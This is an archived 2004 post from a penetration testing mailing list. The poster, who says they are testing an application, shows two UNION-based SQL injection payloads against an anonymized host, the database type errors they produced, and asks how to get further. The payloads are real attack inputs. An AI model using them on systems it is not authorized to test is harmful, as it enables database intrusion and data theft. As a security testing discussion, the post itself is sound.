Penetration Testing mailing list archives

SQL Injection & ncompatible with int issue

From: Peter Bair <peterbair100 () hotmail com>
Date: 9 Jun 2004 23:51:06 -0000



I am currently testing an application that reveals it tables. I know the exact columns to perform a union but when I 
try the following:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1+--

RESULT:
Operand type clash: text is incompatible with int

So I will try the solution:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+--

RESULT:
Invalid column name 'text'.

I know that "text" is in the correct position and I tried 'text'.

Is this app safe or can I go further?

Thanks for any help.

Current thread:

SQL Injection & ncompatible with int issue Peter Bair (Jun 10)
- Re: SQL Injection & ncompatible with int issue Martin Eiszner (Jun 14)
- <Possible follow-ups>
- RE: SQL Injection & ncompatible with int issue Amichai Shulman (Jun 14)